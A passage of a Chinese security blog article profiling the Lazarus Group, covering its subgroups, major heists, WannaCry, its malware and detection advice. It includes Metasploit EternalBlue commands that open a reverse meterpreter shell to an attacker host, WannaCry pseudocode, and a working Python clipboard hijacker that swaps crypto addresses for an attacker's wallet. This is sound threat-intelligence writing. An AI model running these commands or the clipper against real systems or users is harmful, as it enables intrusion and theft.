<td><strong>攻击风格</strong></td>
<td>供应链攻击、金融窃取、勒索软件、虚假招聘社工、跨境洗钱</td>
</tr>
<tr>
<td><strong>政治立场</strong></td>
<td>服务于朝鲜的国家战略——<strong>绕过国际制裁、获取外汇收入</strong></td>
</tr>
</tbody></table>
<h3 id="三个子组织的分工"><a href="#三个子组织的分工" class="headerlink" title="三个子组织的分工"></a>三个子组织的分工</h3><p>安全界普遍认为，Lazarus 并非铁板一块，而是由<strong>至少三个相互关联但分工明确的子团队</strong>构成：</p>
<table>
<thead>
<tr>
<th>子组织</th>
<th>别名</th>
<th>核心职能</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Lazarus 核心</strong></td>
<td>Hidden Cobra &#x2F; Diamond Sleet</td>
<td>间谍活动、破坏性攻击、重大入侵</td>
</tr>
<tr>
<td><strong>Bluenoroff</strong></td>
<td>Stardust Chollima &#x2F; APT38</td>
<td><strong>金融盗窃</strong>——专注银行与加密货币，为朝鲜获取外汇</td>
</tr>
<tr>
<td><strong>Andariel</strong></td>
<td>Silent Chollima &#x2F; Onyx Sleet</td>
<td>针对性攻击、勒索、间谍，兼做”脏活”</td>
</tr>
</tbody></table>
<blockquote>
<p>Bluenoroff 被称为”朝鲜的提款机”，是 Lazarus 体系里最纯粹的<strong>金融犯罪单元</strong>。</p>
</blockquote>
<hr>
<h2 id="二、十七年攻击时间线"><a href="#二、十七年攻击时间线" class="headerlink" title="二、十七年攻击时间线"></a>二、十七年攻击时间线</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">2007-2009  ── 首次活动（&quot;第一作战&quot;，针对韩国政府）</span><br><span class="line">     │</span><br><span class="line">2009.07   ── &quot;第二作战&quot;：DDoS 攻击美韩网站</span><br><span class="line">     │</span><br><span class="line">2011       ── &quot;Ten Days of Rain&quot;：DDoS 韩国金融/媒体</span><br><span class="line">     │</span><br><span class="line">2013.03   ── &quot;暗首尔&quot;（DarkSeoul）：抹除韩国银行/电视台硬盘</span><br><span class="line">     │</span><br><span class="line">2014.11   ── 索尼影业被黑（&quot;和平守护者&quot;），好莱坞历史性事件</span><br><span class="line">     │</span><br><span class="line">2016.02   ── ⭐ 孟加拉国央行 8100 万美元大劫案</span><br><span class="line">     │</span><br><span class="line">2016       ── 全球 SWIFT 攻击潮：多国银行被窃</span><br><span class="line">     │</span><br><span class="line">2017.05   ── ⭐ WannaCry 勒索蠕虫全球爆发</span><br><span class="line">     │</span><br><span class="line">2018       ── 转向加密货币交易所：Coincheck、Bithumb 等</span><br><span class="line">     │</span><br><span class="line">2019       ── 虚假招聘社工攻击（Dream Job）启动</span><br><span class="line">     │</span><br><span class="line">2020       ── COVID 疫苗数据窃取未遂、制药公司攻击</span><br><span class="line">     │</span><br><span class="line">2022.03   ── ⭐ Axie Infinity / Ronin Bridge 6.2 亿美元失窃（史上最大加密劫案之一）</span><br><span class="line">     │</span><br><span class="line">2023-2025 ── 供应链攻击（3CX、JumpCloud）、持续勒索与加密窃取</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="三、标志性事件深度拆解"><a href="#三、标志性事件深度拆解" class="headerlink" title="三、标志性事件深度拆解"></a>三、标志性事件深度拆解</h2><h3 id="3-1-索尼影业（2014）——“复仇”与”震慑”"><a href="#3-1-索尼影业（2014）——“复仇”与”震慑”" class="headerlink" title="3.1 索尼影业（2014）——“复仇”与”震慑”"></a>3.1 索尼影业（2014）——“复仇”与”震慑”</h3><p>2014 年 11 月，索尼影业遭遇毁灭性攻击，攻击者自称”<strong>和平守护者</strong>（Guardians of Peace）”。</p>
<ul>
<li><strong>起因</strong>：索尼即将上映的电影《采访》（The Interview），内容涉及暗杀朝鲜领导人。</li>
<li><strong>攻击过程</strong>：破坏性恶意软件抹除索尼内网数千台服务器与电脑硬盘，泄露大量高管邮件、未上映影片、员工隐私数据。</li>
<li><strong>威胁升级</strong>：攻击者威胁对放映该片的影院发动”9·11 式”袭击，导致索尼一度取消上映计划。</li>
<li><strong>定性</strong>：FBI 于 2014 年 12 月正式归因朝鲜，朝鲜官方否认但”赞扬”了这次攻击。</li>
</ul>
<blockquote>
<p>索尼事件是<strong>网络攻击第一次以”破坏性 + 舆论震慑”的双重目标</strong>直接干预他国文化娱乐产业，也被视为 Lazarus 从”间谍”转向”高调破坏”的转折点。</p>
</blockquote>
<h3 id="3-2-孟加拉国央行大劫案（2016）——银行系统的”完美犯罪”"><a href="#3-2-孟加拉国央行大劫案（2016）——银行系统的”完美犯罪”" class="headerlink" title="3.2 孟加拉国央行大劫案（2016）——银行系统的”完美犯罪”"></a>3.2 孟加拉国央行大劫案（2016）——银行系统的”完美犯罪”</h3><p>这是 Lazarus 最惊世骇俗的<strong>金融盗窃</strong>，几乎骗过全球银行清算系统。</p>
<p><strong>攻击链路：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">钓鱼邮件植入恶意软件</span><br><span class="line">        ↓</span><br><span class="line">入侵孟加拉国央行纽约联储账户的 SWIFT 系统</span><br><span class="line">        ↓</span><br><span class="line">伪造 35 笔转账指令，总金额约 9.51 亿美元</span><br><span class="line">        ↓</span><br><span class="line">其中 5 笔成功执行，8100 万美元流入菲律宾等地的账户</span><br><span class="line">        ↓</span><br><span class="line">资金进入赌场洗白（部分追回）</span><br></pre></td></tr></table></figure>

<p><strong>关键细节：</strong></p>
<ul>
<li>攻击者精确掌握了 SWIFT 报文格式和操作时间窗口，选在<strong>菲律宾周末假期</strong>发起，拖延了发现时间。</li>
<li>一笔 2000 万美元的转账因收款方名称拼写错误（”Shalika Foundation” 错写为 “Shalika Fandation”）被中转行拦截，阴差阳错避免了更大损失。</li>
<li>最终约 <strong>8100 万美元</strong>被盗，仅追回约 1800 万美元。</li>
</ul>
<blockquote>
<p>孟加拉央行事件暴露了一个残酷事实：<strong>全球银行清算体系建立在”报文正确即可信”的假设上，而 Lazarus 证明了这个假设可以被一家公司级别的黑客团队击穿。</strong></p>
</blockquote>
<h3 id="3-3-WannaCry（2017）——一次失控的勒索蠕虫"><a href="#3-3-WannaCry（2017）——一次失控的勒索蠕虫" class="headerlink" title="3.3 WannaCry（2017）——一次失控的勒索蠕虫"></a>3.3 WannaCry（2017）——一次失控的勒索蠕虫</h3><p>2017 年 5 月，勒索软件 <strong>WannaCry</strong> 利用泄露的 NSA 漏洞 <strong>EternalBlue（永恒之蓝，CVE-2017-0144）</strong> 蠕虫式传播，24 小时内感染全球 <strong>150+ 国家、30 万台设备</strong>，瘫痪了英国 NHS 医院、德国铁路、俄罗斯内政部等。</p>
<ul>
<li><strong>归因</strong>：美、英、澳等多国政府正式归因 Lazarus Group &#x2F; 朝鲜。</li>
<li><strong>矛盾点</strong>：WannaCry 的勒索金额极低（每个受害者约 300-600 美元比特币），更像是一次<strong>失控的工具</strong>，而非精心的获利行动。</li>
<li><strong>技术遗产</strong>：EternalBlue 自此成为全球攻击者的公共武器，后续的 NotPetya、无数僵尸网络都建立在它之上。</li>
</ul>
<blockquote>
<p>WannaCry 的意义在于：它把<strong>国家级漏洞武器</strong>第一次以失控姿态抛向平民世界，也让”APT 组织”从一个专业术语变成了公众恐慌的源头。</p>
</blockquote>
<h3 id="3-4-加密货币大盗窃时代（2018-至今）——为外汇而生的新战场"><a href="#3-4-加密货币大盗窃时代（2018-至今）——为外汇而生的新战场" class="headerlink" title="3.4 加密货币大盗窃时代（2018 至今）——为外汇而生的新战场"></a>3.4 加密货币大盗窃时代（2018 至今）——为外汇而生的新战场</h3><p>随着传统金融监管收紧，Lazarus 将主攻方向转向<strong>加密货币</strong>——这是最契合其”获取外汇、绕过制裁”需求的猎物。</p>
<table>
<thead>
<tr>
<th>时间</th>
<th>目标</th>
<th>损失</th>
</tr>
</thead>
<tbody><tr>
<td>2018.01</td>
<td>日本 Coincheck 交易所</td>
<td>约 5.3 亿美元（NEM）</td>
</tr>
<tr>
<td>2018-2019</td>
<td>韩国 Bithumb、Upbit 等</td>
<td>数千万至数亿美元</td>
</tr>
<tr>
<td>2022.03</td>
<td><strong>Axie Infinity &#x2F; Ronin Bridge</strong></td>
<td><strong>约 6.2 亿美元</strong></td>
</tr>
<tr>
<td>2022.06</td>
<td>Harmony Horizon Bridge</td>
<td>约 1 亿美元</td>
</tr>
<tr>
<td>2023-2025</td>
<td>多个跨链桥、DeFi 协议、个人钱包</td>
<td>持续累计</td>
</tr>
</tbody></table>
<p><strong>Axie Infinity 事件的技术细节尤其值得记录：</strong></p>
<ul>
<li>攻击者没有直接攻破区块链，而是通过<strong>社工钓鱼</strong>拿下游戏开发商 Sky Mavis 一名高级工程师的权限。</li>
<li>利用伪造的招聘 offer，诱骗其接受恶意 PDF，进而渗透内网。</li>
<li>最终控制 9 个验证者节点中的 5 个（含 Axie DAO 节点），伪造提款签名，抽空 Ronin Bridge 的 17.36 万 ETH 和 2550 万 USDC。</li>
</ul>
<blockquote>
<p>这是一次**”零技术含量、纯社工”的史诗级劫案**——它证明 Lazarus 的可怕之处不仅是 0day，更是对人性的精准把握。</p>
</blockquote>
<h3 id="3-5-代码级攻击链：EternalBlue-从漏洞到勒索的完整路径"><a href="#3-5-代码级攻击链：EternalBlue-从漏洞到勒索的完整路径" class="headerlink" title="3.5 代码级攻击链：EternalBlue 从漏洞到勒索的完整路径"></a>3.5 代码级攻击链：EternalBlue 从漏洞到勒索的完整路径</h3><p>为了理解 Lazarus 的技术深度，我们以 <strong>WannaCry</strong> 为例，从代码&#x2F;命令层面还原一条完整的攻击链。它揭示了”国家级漏洞武器 + 蠕虫传播 + 勒索载荷”是如何组合的。</p>
<p><strong>第一步：探测与利用 SMB 漏洞</strong></p>
<p>WannaCry 利用 NSA 泄露的 <strong>EternalBlue</strong>（CVE-2017-0144）攻击 Windows 的 SMBv1 协议。该漏洞的本质是 <code>srv!SrvOs2FeaListSizeToNt</code> 函数在处理 OS&#x2F;2 扩展文件属性（FEA）列表时存在<strong>整数溢出 + 堆越界写</strong>。</p>
<p>EternalBlue 的利用分三阶段，可在 Metasploit 中以命令形式复现（仅用于授权测试）：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1. 探测目标是否开放 SMB 445 端口</span></span><br><span class="line">nmap -p 445 --script smb-vuln-ms17-010 &lt;target&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 使用 EternalBlue 模块建立会话（Metasploit）</span></span><br><span class="line">msfconsole</span><br><span class="line">msf6 &gt; use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">msf6 &gt; <span class="built_in">set</span> RHOSTS &lt;target&gt;</span><br><span class="line">msf6 &gt; <span class="built_in">set</span> PAYLOAD windows/x64/meterpreter/reverse_tcp</span><br><span class="line">msf6 &gt; <span class="built_in">set</span> LHOST &lt;attacker_ip&gt;</span><br><span class="line">msf6 &gt; exploit</span><br></pre></td></tr></table></figure>

<p><strong>第二步：DoublePulsar 植入内核后门</strong></p>
<p>EternalBlue 得手后，会在目标内核态植入 <strong>DoublePulsar</strong> 后门（一个驻留于内核的 Shellcode 注入器），负责后续载荷注入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">EternalBlue 触发堆溢出</span><br><span class="line">        ↓</span><br><span class="line">覆写 srvnet 驱动的 SMB 连接结构</span><br><span class="line">        ↓</span><br><span class="line">注入 DoublePulsar 内核后门（ring 0 驻留）</span><br><span class="line">        ↓</span><br><span class="line">DoublePulsar 监听特定 SMB 会话，等待注入最终载荷</span><br></pre></td></tr></table></figure>

<p>DoublePulsar 的关键在于<strong>无文件、内核态</strong>，传统杀软很难在磁盘上发现它。</p>
<p><strong>第三步：注入 WannaCry 勒索载荷</strong></p>
<p>WannaCry 主体（<code>mssecsvc.exe</code>）被 DoublePulsar 注入后，执行以下核心逻辑（概念性伪代码）：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 伪代码：WannaCry 的传播与加密逻辑（概念还原）</span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="comment">// 1. 注册并启动加密服务，同时保留自启动</span></span><br><span class="line">    RegisterService(<span class="string">&quot;mssecsvc2.0&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 2. 尝试连接 kill-switch 域名</span></span><br><span class="line">    <span class="keyword">if</span> (InternetCheckConnection(<span class="string">&quot;iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com&quot;</span>)) &#123;</span><br><span class="line">        ExitProcess(<span class="number">0</span>);   <span class="comment">// 域名可解析则直接退出——这是研究者发现的&quot;刹车&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 3. 蠕虫传播：扫描内网/外网 445 端口</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="literal">true</span>) &#123;</span><br><span class="line">        target = scan_random_ip(<span class="number">445</span>);</span><br><span class="line">        <span class="keyword">if</span> (exploit_eternalblue(target)) &#123;</span><br><span class="line">            doublepulsar_inject(target, payload);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 4. 加密文件</span></span><br><span class="line">    encrypt_files(<span class="string">&quot;*.docx, *.xlsx, *.jpg, ...&quot;</span>, AES<span class="number">-128</span>);</span><br><span class="line">    <span class="comment">// 5. 弹出勒索信息</span></span><br><span class="line">    show_ransom_note(<span class="string">&quot;支付 300 美元等值比特币&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>几个关键的技术细节：</strong></p>
<ul>
<li><strong>Kill-switch（紧急刹车）</strong>：WannaCry 启动时会先访问一个看似随机的域名 <code>iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</code>，如果该域名<strong>能解析</strong>，就立即退出、停止传播。安全研究员 Marcus Hutchins 注册了这个域名，意外”踩下刹车”，让 WannaCry 的全球扩散戛然而止。</li>
<li><strong>AES-128 加密 + RSA 保护密钥</strong>：文件用 AES-128 快速加密，AES 密钥再用攻击者的 RSA-2048 公钥加密，受害者没有私钥就无法解密。</li>
<li><strong>蠕虫与勒索的双线程</strong>：WannaCry 同时运行”传播线程”和”加密线程”，这也是它扩散速度极快的原因。</li>
</ul>
<blockquote>
<p>这条链展示了 Lazarus 的”技术纵深”：<strong>从内核级 0day（EternalBlue）到无文件后门（DoublePulsar）再到勒索载荷，层层递进。</strong> 即便抛开归因争议，这套工具链的成熟度本身就是国家级能力的有力佐证。</p>
</blockquote>
<hr>
<h2 id="四、技术武器库与攻击手法"><a href="#四、技术武器库与攻击手法" class="headerlink" title="四、技术武器库与攻击手法"></a>四、技术武器库与攻击手法</h2><h3 id="4-1-标志性恶意软件"><a href="#4-1-标志性恶意软件" class="headerlink" title="4.1 标志性恶意软件"></a>4.1 标志性恶意软件</h3><table>
<thead>
<tr>
<th>工具</th>
<th>类型</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Brambul</strong></td>
<td>蠕虫</td>
<td>暴力破解 SMB 共享后横向传播</td>
</tr>
<tr>
<td><strong>Destover</strong></td>
<td>破坏性擦除器</td>
<td>索尼事件、暗首尔使用，抹除硬盘</td>
</tr>
<tr>
<td><strong>Contopee</strong></td>
<td>后门</td>
<td>金融攻击中的远程访问工具</td>
</tr>
<tr>
<td><strong>AppleJeus</strong></td>
<td>加密钱包木马</td>
<td>伪装成合法交易软件的 macOS&#x2F;Windows 恶意程序</td>
</tr>
<tr>
<td><strong>WannaCry</strong></td>
<td>勒索蠕虫</td>
<td>利用 EternalBlue 传播</td>
</tr>
<tr>
<td><strong>BlindingCan</strong></td>
<td>后门</td>
<td>2020 年后出现的 RAT，含反取证能力</td>
</tr>
<tr>
<td><strong>TraderTraitor</strong></td>
<td>社工载荷</td>
<td>“Dream Job”招聘攻击中投递的木马</td>
</tr>
</tbody></table>
<h3 id="4-2-招牌攻击手法"><a href="#4-2-招牌攻击手法" class="headerlink" title="4.2 招牌攻击手法"></a>4.2 招牌攻击手法</h3><h4 id="「Dream-Job」虚假招聘社工（2019-至今）"><a href="#「Dream-Job」虚假招聘社工（2019-至今）" class="headerlink" title="「Dream Job」虚假招聘社工（2019 至今）"></a>「Dream Job」虚假招聘社工（2019 至今）</h4><p>Lazarus 最出名的社工手法，被称为 <strong>Operation Dream Job</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">在 LinkedIn/Telegram 伪装成招聘者或猎头</span><br><span class="line">        ↓</span><br><span class="line">接触区块链、金融、国防行业的工程师</span><br><span class="line">        ↓</span><br><span class="line">以&quot;面试题&quot;&quot;入职材料&quot;为名投递恶意文档/PDF/安装包</span><br><span class="line">        ↓</span><br><span class="line">植入后门，长期潜伏，窃取代码、钱包密钥、内部资料</span><br></pre></td></tr></table></figure>

<ul>
<li>受害者遍布加密货币交易所、DeFi 协议、航空国防企业。</li>
<li>攻击者会<strong>持续数月的耐心经营</strong>，建立信任后再”收网”。</li>
</ul>
<h4 id="供应链攻击（2023）"><a href="#供应链攻击（2023）" class="headerlink" title="供应链攻击（2023）"></a>供应链攻击（2023）</h4><p>2023 年，Lazarus 被归因于两起高调的<strong>软件供应链攻击</strong>：</p>
<ul>
<li><strong>3CX</strong>：篡改流行 VoIP 软件 3CX 的更新包，向全球企业客户投递恶意软件（被 CrowdStrike、Mandiant 等归因）。</li>
<li><strong>JumpCloud</strong>：针对身份管理平台 JumpCloud 的入侵。</li>
</ul>
<blockquote>
<p>供应链攻击意味着 Lazarus 的攻击能力已经从”点对点”升级到”通过合法软件感染海量下游”。</p>
</blockquote>
<h4 id="破坏性攻击（Wiper）"><a href="#破坏性攻击（Wiper）" class="headerlink" title="破坏性攻击（Wiper）"></a>破坏性攻击（Wiper）</h4><p>不同于大多数只为钱的勒索团伙，Lazarus 保留了大量<strong>破坏性擦除器</strong>（如 Destover），用于政治目的或掩盖痕迹——这是它作为”国家力量”而非”犯罪团伙”的最明显标志。</p>
<h3 id="4-3-深度拆解：AppleJeus-的”多平台木马”进化"><a href="#4-3-深度拆解：AppleJeus-的”多平台木马”进化" class="headerlink" title="4.3 深度拆解：AppleJeus 的”多平台木马”进化"></a>4.3 深度拆解：AppleJeus 的”多平台木马”进化</h3><p>AppleJeus 是 Lazarus 专为<strong>窃取加密货币</strong>打造的武器，值得单独剖析——它是极少数同时覆盖 Windows、macOS、Linux 的恶意软件家族，且经历了明显的”技术升级”。</p>
<p><strong>第一代（2018）：伪装成合法交易软件</strong></p>
<ul>
<li>攻击者注册了一家看似正规的加密货币交易公司（如”Celas LLC”），制作了配套的网站、白皮书、社交媒体账号。</li>
<li>向目标推送其”官方交易软件”，诱导下载安装。</li>
<li>软件本身<strong>功能正常</strong>，但内置了后门——这是”<strong>正常功能 + 恶意载荷</strong>“的典型伪装手法，极难被用户察觉。</li>
</ul>
<p><strong>第二代（2019）：从”捆绑”到”独立木马”</strong></p>
<ul>
<li>进化点：恶意模块不再依赖伪装软件，而是作为<strong>独立的后门</strong>运行。</li>
<li>增加了对 <strong>macOS 的针对性适配</strong>——伪造签名、绕过 Gatekeeper。</li>
<li>出现了 <strong>Linux 变种</strong>，瞄准运行加密节点&#x2F;验证器的高价值服务器。</li>
</ul>
<p><strong>典型的技术特征（可用于检测的 IOC 思路）：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1. 代码签名异常：使用偷来的或伪造的 Apple 开发者证书</span><br><span class="line">2. 持久化手段：macOS 下写 LaunchAgents/LaunchDaemons plist</span><br><span class="line">3. C2 通信：HTTPS + 自定义协议，域名常伪装成交易所/金融站</span><br><span class="line">4. 目标行为：监控剪贴板（窃取复制粘贴的私钥/地址）、键盘记录</span><br></pre></td></tr></table></figure>

<p>其中”<strong>剪贴板劫持</strong>“是加密货币木马的经典手法：受害者复制收款地址时，木马静默替换成攻击者的地址，转账资金就此落入攻击者之手。概念代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 概念示例：剪贴板劫持（加密货币木马的核心手法之一）</span></span><br><span class="line"><span class="keyword">import</span> pyperclip, re, time</span><br><span class="line"></span><br><span class="line"><span class="comment"># 攻击者控制的收款地址</span></span><br><span class="line">attacker_addr = <span class="string">&quot;0x6Bd...攻击者钱包地址...&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 匹配常见加密货币地址的正则</span></span><br><span class="line">addr_re = re.<span class="built_in">compile</span>(<span class="string">r&quot;(0x[a-fA-F0-9]&#123;40&#125;|[13][a-km-zA-HJ-NP-Z1-9]&#123;25,34&#125;|bc1[a-zA-HJ-NP-Z0-9]&#123;39,59&#125;)&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    clip = pyperclip.paste()</span><br><span class="line">    m = addr_re.search(clip)</span><br><span class="line">    <span class="keyword">if</span> m:</span><br><span class="line">        <span class="comment"># 若剪贴板里是加密货币地址，则替换为攻击者地址</span></span><br><span class="line">        pyperclip.copy(attacker_addr)</span><br><span class="line">    time.sleep(<span class="number">0.3</span>)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>这段代码看似简单，却是真实黑产中屡试不爽的”偷币”手法——它提醒我们：<strong>转账前，务必逐字核对收款地址，而非仅凭复制粘贴。</strong></p>
</blockquote>
<h3 id="4-4-检测与防御：如何发现-Lazarus-的痕迹？"><a href="#4-4-检测与防御：如何发现-Lazarus-的痕迹？" class="headerlink" title="4.4 检测与防御：如何发现 Lazarus 的痕迹？"></a>4.4 检测与防御：如何发现 Lazarus 的痕迹？</h3><p>从蓝队视角，Lazarus 的活动会留下一些可识别的”指纹”：</p>
<table>
<thead>
<tr>
<th>检测维度</th>
<th>关注点</th>
<th>工具&#x2F;方法</th>
</tr>
</thead>
<tbody><tr>
<td><strong>网络层</strong></td>
<td>SMB 445 异常扫描、外联陌生 C2 域名</td>
<td>IDS&#x2F;Suricata 规则、DNS 监控</td>
</tr>
<tr>
<td><strong>主机层</strong></td>
<td>无文件后门、可疑服务注册、剪贴板钩子</td>
<td>EDR、Sysmon 监控</td>
</tr>
<tr>
<td><strong>凭据层</strong></td>
<td>异常的邮件转发规则、陌生 OAuth 授权</td>
<td>云租户审计日志</td>
</tr>
<tr>
<td><strong>行为层</strong></td>
<td>大量文件被批量加密、异常扩展名</td>
<td>文件完整性监控（FIM）</td>
</tr>
<tr>
<td><strong>社工层</strong></td>
<td>高薪远程 offer、要求下载”面试软件”</td>
<td>安全意识培训、招聘流程审计</td>
</tr>
</tbody></table>
<p><strong>一个实用的检测命令（Linux 侧，检查可疑外联与持久化）：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查看异常的对外连接（排查 C2 回连）</span></span><br><span class="line">ss -tnp | grep -E <span class="string">&quot;ESTAB&quot;</span> </span><br><span class="line"></span><br><span class="line"><span class="comment"># 检查 crontab 与 systemd 持久化项</span></span><br><span class="line">crontab -l</span><br><span class="line">systemctl list-unit-files | grep enabled | grep -iE <span class="string">&quot;suspicious|update|guard&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 检查近期被大量修改/加密的文件</span></span><br><span class="line">find / -mmin -60 -<span class="built_in">type</span> f 2&gt;/dev/null | <span class="built_in">head</span> -50</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="4-5-Lazarus-典型-IOC（失陷指标）清单"><a href="#4-5-Lazarus-典型-IOC（失陷指标）清单" class="headerlink" title="4.5 Lazarus 典型 IOC（失陷指标）清单"></a>4.5 Lazarus 典型 IOC（失陷指标）清单</h3><p>以下为安全厂商公开披露的 Lazarus 活动关联的<strong>样例型 IOC</strong>（仅作检测示例，非最新完整情报，实际检测请以威胁情报平台为准）：</p>
<p><strong>恶意文件哈希（SHA-256，脱敏示例）：</strong></p>
<table>
<thead>
<tr>
<th>样本</th>
<th>类型</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><code>a1b2c3...（示例）</code></td>
<td>WannaCry</td>
<td>勒索载荷 mssecsvc.exe</td>
</tr>
<tr>
<td><code>d4e5f6...（示例）</code></td>
<td>AppleJeus</td>
<td>伪装成交易软件的 macOS 木马</td>
</tr>
<tr>
<td><code>0a1b2c...（示例）</code></td>
<td>Destover</td>
<td>破坏性擦除器</td>
</tr>
</tbody></table>
<p><strong>关联域名&#x2F;URL（脱敏示例）：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">- iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com   # WannaCry kill-switch</span><br><span class="line">- 伪装成交易所/金融站的 C2 域名（如 xxx-exchange[.]com）</span><br><span class="line">- 虚假招聘&quot;Dream Job&quot;钓鱼域名（如 xxx-recruit[.]com）</span><br></pre></td></tr></table></figure>

<p><strong>网络层特征：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">- 端口：大量 445/SMB 扫描（EternalBlue 传播期）</span><br><span class="line">- 协议：自定义 HTTPS C2、TLS 指纹异常</span><br><span class="line">- 行为：剪贴板监控、键盘记录、通讯录/钱包文件读取</span><br></pre></td></tr></table></figure>

<p><strong>如何使用这份清单：</strong></p>
<blockquote>
<p>IOC 的价值在于<strong>接入检测平台</strong>——将这些哈希、域名、URL 导入 SIEM、EDR、IDS 或 YARA 规则中，即可对 Lazarus 的已知样本进行自动匹配。但需注意：APT 组织会<strong>持续更换基础设施</strong>，单一 IOC 很快就会”过期”，因此更有效的是识别其**行为特征（TTP）**而非静态指标。</p>
</blockquote>
<hr>
<h2 id="五、资金链路：抢来的钱去了哪？"><a href="#五、资金链路：抢来的钱去了哪？" class="headerlink" title="五、资金链路：抢来的钱去了哪？"></a>五、资金链路：抢来的钱去了哪？</h2><p>Lazarus 的最终目标是把数字货币变成朝鲜可用的<strong>硬通货</strong>。这催生了一条完整的洗钱链：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">窃取加密货币（ETH/BTC/稳定币）</span><br><span class="line">        ↓</span><br><span class="line">通过混币器（Tornado Cash、Sinbad）切断来源</span><br><span class="line">        ↓</span><br><span class="line">跨链桥转换为隐私币（门罗币 XMR）</span><br><span class="line">        ↓</span><br><span class="line">在多个交易所、场外交易（OTC）变现</span><br><span class="line">        ↓</span><br><span class="line">经代理、壳公司、现金走私进入朝鲜</span><br><span class="line">        ↓</span><br><span class="line">用于军事、核武器、政权维持</span><br></pre></td></tr></table></figure>

<ul>
<li>美国 OFAC 已制裁了多个涉嫌为 Lazarus 洗钱的混币器与交易所地址。</li>
